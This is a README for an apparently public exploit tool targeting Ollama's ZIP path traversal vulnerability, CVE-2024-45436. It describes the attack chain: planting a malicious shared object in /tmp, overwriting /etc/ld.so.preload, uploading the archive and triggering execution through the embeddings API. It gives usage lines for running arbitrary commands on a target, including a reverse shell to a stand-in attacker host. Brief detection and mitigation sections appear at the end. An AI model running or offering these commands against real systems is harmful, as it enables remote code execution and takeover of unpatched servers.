# Ollama CVE-2024-45436 Exploit

A clean and efficient exploit implementation for the Ollama ZIP traversal vulnerability (CVE-2024-45436).
中文文档：[README_CN.md](./README_CN.md)

## Vulnerability Description

CVE-2024-45436 is a path traversal vulnerability (also known as "Zip Slip") in Ollama versions prior to 0.1.47. The vulnerability allows attackers to write files to arbitrary locations on the filesystem by exploiting improper validation of paths during ZIP file extraction operations.

The flaw exists in the `extractFromZipFile` function in Ollama's `model.go` file, which extracts model files. When a ZIP file contains entries with paths including directory traversal sequences (`../`), Ollama extracts these files outside the intended directory, potentially allowing an attacker to overwrite critical system files.

## Exploit Mechanism

This exploit leverages the vulnerability through the following approach:

1. Creates a malicious shared object file (`hook.so`) containing arbitrary command execution code
2. Packages it into a specially crafted ZIP file with path traversal entries:
   - `../../../../../../../../../../etc/ld.so.preload` - Used to preload custom shared objects
   - `../../../../../../../../../../tmp/hook.so` - The malicious shared object itself
3. Uploads the ZIP file via Ollama's blob API
4. Creates a model referencing the uploaded blob
5. Triggers execution by requesting embeddings from Ollama

When successfully executed, the payload runs with the same permissions as the Ollama service, potentially granting remote code execution as root.

## Requirements

- Python 3.6+
- Required Python packages:
  - requests
  - argparse
- GCC (to compile the shared object)
- A vulnerable Ollama instance (pre-0.1.47) running on Linux

## Usage

```bash
python exp.py <target_url> <command>
```

### Arguments

- `target_url`: The URL of the vulnerable Ollama instance (e.g., http://example.com:11434)
- `command`: The command to execute on the target system

### Options

- `--no-cleanup`: Do not remove temporary files after exploitation (useful for debugging)

### Examples

Basic usage:
```bash
python exp.py http://target-server:11434 "id > /tmp/pwned"
```

Reverse shell:
```bash
python exp.py http://target-server:11434 "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'"
```

## Disclaimer

This tool is provided for educational and authorized security testing purposes only. Unauthorized use against systems without explicit permission is illegal and unethical. The author takes no responsibility for misuse of this software.

## Detection

Organizations can detect if they are vulnerable by:

1. Checking their Ollama version with `/api/version`
2. Looking for unexpected files in `/etc/ld.so.preload` or `/tmp/hook.so`
3. Monitoring for unusual model creation activities

## Mitigation

- Update Ollama to version 0.1.47 or later
- If immediate update is not possible, restrict network access to Ollama API endpoints
- Run Ollama with minimal privileges, not as root

## Technical Details

The vulnerability exploits improper path validation in Ollama's ZIP file extraction process. When a model is loaded through the API, the application extracts files from a ZIP archive without properly sanitizing file paths, allowing directory traversal attacks.

The `ld.so.preload` file is used in Linux to specify shared libraries that should be loaded before all others. By writing to this file, the attacker can ensure their malicious library is loaded by any new process, effectively hijacking program execution.

## License

This project is licensed under the MIT License - see the LICENSE file for details.
